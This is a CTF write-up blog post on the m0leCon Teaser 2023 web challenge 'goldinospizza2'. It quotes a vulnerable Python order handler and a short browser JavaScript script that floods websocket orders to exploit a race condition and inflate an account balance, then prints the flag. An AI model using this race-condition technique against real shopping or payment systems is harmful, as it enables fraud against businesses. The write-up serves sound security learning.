<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>m0leCon Teaser 2023 Writeup | cjxol.com</title>
<meta name="generator" content="Jekyll v3.8.7" />
<meta property="og:title" content="m0leCon Teaser 2023 Writeup" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="m0leCon Teaser 2023 On CTFtime" />
<meta property="og:description" content="m0leCon Teaser 2023 On CTFtime" />
<link rel="canonical" href="https://www.cjxol.com/posts/m0lecon-teaser-2023-writeup/" />
<meta property="og:url" content="https://www.cjxol.com/posts/m0lecon-teaser-2023-writeup/" />
<meta property="og:site_name" content="cjxol.com" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-05-16T00:00:00+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="m0leCon Teaser 2023 Writeup" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2023-05-16T00:00:00+01:00","datePublished":"2023-05-16T00:00:00+01:00","description":"m0leCon Teaser 2023 On CTFtime","headline":"m0leCon Teaser 2023 Writeup","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.cjxol.com/posts/m0lecon-teaser-2023-writeup/"},"url":"https://www.cjxol.com/posts/m0lecon-teaser-2023-writeup/"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://www.cjxol.com/feed.xml" title="cjxol.com" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">cjxol.com</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">m0leCon Teaser 2023 Writeup</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2023-05-16T00:00:00+01:00" itemprop="datePublished">May 16, 2023
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p><a href="https://ctf.m0lecon.it/">m0leCon Teaser 2023</a><br />
<a href="https://ctftime.org/event/1898">On CTFtime</a></p>

<p>Overall good CTF with challenging original fun challenges.</p>

<p>On this page:</p>

<ul>
  <li><a href="#goldinospizza2">goldinospizza2</a> - Web, websocket API, exploit race condition</li>
</ul>

<h2 id="goldinospizza2">goldinospizza2</h2>

<p>The challenge was released at about 2:40 AM BST as the “<a href="https://discord.com/channels/1100159162794655904/1100159163096633447/1106757967291879506"><del>patched</del> <em>improved</em> version of <code class="highlighter-rouge">goldinospizza</code></a>”, which was about over 8 hours into the CTF. It was just before I was planning to go to bed, but the challenge looked solvable😅.</p>

<p>The challenge was a web challenge with a website that allowed you to order pizza with a registered account. Most of the pizzas’ prices were ranging between 6 and 15, but there was one pizza named “The flagship of pizzas” that costs 1,000,000. The flag will be shown if this pizza is successfully ordered. The initial account balance is 30.</p>

<p>Looking through the code, there are two websocket API functions that are interesting, one is <code class="highlighter-rouge">order</code>, and another one is <code class="highlighter-rouge">cancel</code>. The <code class="highlighter-rouge">order</code> function is used to order a pizza, and the <code class="highlighter-rouge">cancel</code> function is used to cancel an order and get refund.</p>

<p>The <code class="highlighter-rouge">order</code> function is implemented as follows:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">order</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">ws</span><span class="p">,</span> <span class="n">n</span><span class="p">):</span>
    <span class="c1"># Some checks on input omitted
</span>    <span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[</span><span class="s">"orders"</span><span class="p">]:</span>
        <span class="c1"># Some checks on input omitted
</span>        <span class="k">if</span> <span class="nb">type</span><span class="p">(</span><span class="n">item</span><span class="p">[</span><span class="s">"quantity"</span><span class="p">])</span> <span class="ow">is</span> <span class="ow">not</span> <span class="nb">int</span><span class="p">:</span>
            <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">rollback</span><span class="p">()</span>
            <span class="k">raise</span> <span class="nb">AssertionError</span><span class="p">(</span><span class="s">"ONE OF YOUR 🍕 'quantity' IS NOT INT"</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">item</span><span class="p">[</span><span class="s">"quantity"</span><span class="p">]</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">:</span>
            <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">rollback</span><span class="p">()</span>
            <span class="k">raise</span> <span class="nb">AssertionError</span><span class="p">(</span><span class="s">"ONE OF YOUR 🍕 'quantity' IS NOT VALID"</span><span class="p">)</span>
        <span class="n">product</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="n">db</span><span class="p">.</span><span class="n">select</span><span class="p">(</span><span class="n">Product</span><span class="p">).</span><span class="nb">filter</span><span class="p">(</span>
            <span class="n">Product</span><span class="p">.</span><span class="nb">id</span> <span class="o">==</span> <span class="n">item</span><span class="p">[</span><span class="s">"product"</span><span class="p">])).</span><span class="n">scalars</span><span class="p">().</span><span class="n">one_or_none</span><span class="p">()</span>
        <span class="k">if</span> <span class="n">product</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
            <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">rollback</span><span class="p">()</span>
            <span class="k">raise</span> <span class="nb">AssertionError</span><span class="p">(</span><span class="s">"WE DON'T SELL THAT 🍕"</span><span class="p">)</span>
        <span class="n">quantity</span> <span class="o">=</span> <span class="n">item</span><span class="p">[</span><span class="s">"quantity"</span><span class="p">]</span>
        <span class="n">current_user</span><span class="p">.</span><span class="n">balance</span> <span class="o">-=</span> <span class="n">product</span><span class="p">.</span><span class="n">price</span> <span class="o">*</span> <span class="n">quantity</span>
        <span class="k">if</span> <span class="n">current_user</span><span class="p">.</span><span class="n">balance</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">:</span>
            <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">rollback</span><span class="p">()</span>
            <span class="k">raise</span> <span class="nb">AssertionError</span><span class="p">(</span><span class="s">"NO 🍕 STEALING ALLOWED!"</span><span class="p">)</span>
        <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">Order</span><span class="p">(</span>
            <span class="n">user_id</span><span class="o">=</span><span class="n">current_user</span><span class="p">.</span><span class="nb">id</span><span class="p">,</span>
            <span class="n">product_id</span><span class="o">=</span><span class="n">product</span><span class="p">.</span><span class="nb">id</span><span class="p">,</span>
            <span class="n">product_quantity</span><span class="o">=</span><span class="n">quantity</span><span class="p">,</span>
            <span class="n">product_price</span><span class="o">=</span><span class="n">product</span><span class="p">.</span><span class="n">price</span>
        <span class="p">))</span>
        <span class="k">if</span> <span class="n">product</span><span class="p">.</span><span class="nb">id</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">quantity</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span>
            <span class="n">ws</span><span class="p">.</span><span class="n">send</span><span class="p">(</span>
                <span class="sa">f</span><span class="s">"WOW you are SO rich! Here's a little extra with your golden special 🍕: </span><span class="si">{</span><span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">[</span><span class="s">'FLAG'</span><span class="p">]</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
    <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">current_user</span><span class="p">)</span>
    <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">commit</span><span class="p">()</span>
    <span class="k">return</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="s">"orders"</span><span class="p">]),</span> <span class="p">{</span><span class="s">"ok"</span><span class="p">:</span> <span class="bp">True</span><span class="p">,</span> <span class="s">"balance"</span><span class="p">:</span> <span class="n">current_user</span><span class="p">.</span><span class="n">balance</span><span class="p">,</span> <span class="s">"orders"</span><span class="p">:</span> <span class="n">_orders</span><span class="p">()}</span>
</code></pre></div></div>

<p>In the code, I identified that there is a race condition that can be exploited to make total order larger than we have in the balance, and cancel the order to refund so we can have more balanced than we started with.</p>

<p>We can blast with multiple websocket requests to make order, and if the previous order has not been committed to the database, the next request is still checked against the old balance.</p>

<p>To make programming easier, I did scripting within the browser console within the context of the website. After some initial test, my balance increased to 66.00 from the initial 30.00.</p>

<p><img src="/assets/image/m0lecon-teaser-2023-writeup/pizza-balance.png" alt="Balance increased to 66.00" /></p>

<p>The script I used to blast the order is as follows:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">let</span> <span class="nx">message</span> <span class="o">=</span> <span class="p">{</span>
    <span class="dl">"</span><span class="s2">request</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">order</span><span class="dl">"</span><span class="p">,</span>
    <span class="dl">"</span><span class="s2">orders</span><span class="dl">"</span><span class="p">:</span> <span class="p">[{</span>
        <span class="dl">"</span><span class="s2">product</span><span class="dl">"</span><span class="p">:</span> <span class="mi">19</span><span class="p">,</span>
        <span class="dl">"</span><span class="s2">quantity</span><span class="dl">"</span><span class="p">:</span> <span class="mi">9792</span><span class="p">,</span>
    <span class="p">},</span> <span class="p">],</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">20</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
    <span class="kd">const</span> <span class="nx">ws</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">`wss://goldinospizza2.challs.m0lecon.it/sock`</span><span class="p">);</span>
    <span class="nx">ws</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">open</span><span class="dl">"</span><span class="p">,</span> <span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
        <span class="nx">ws</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">message</span><span class="p">))</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The connection will get killed after some numbers of requests. To scale this up, when I repeated the process, I increased the quantity of each of the order to the amount that I can afford with the balance. Then my available balance increased increases exponentially.</p>

<p>With enough balance, order the golden “The flagship of pizzas”, get the flag and submitted at 4:00 AM BST. Enjoy the 🍕:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ptm{https://youtu.be/Uzryuem5NDc lets make pizza greater than zero again https://www.giallozafferano.com/recipes/Pizza-Margherita.html}
</code></pre></div></div>

  </div><a class="u-url" href="/posts/m0lecon-teaser-2023-writeup/" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">cjxol.com</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">cjxol.com</li><li><a class="u-email" href="mailto:i@cjxol.com">i@cjxol.com</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/allc"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">allc</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p></p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
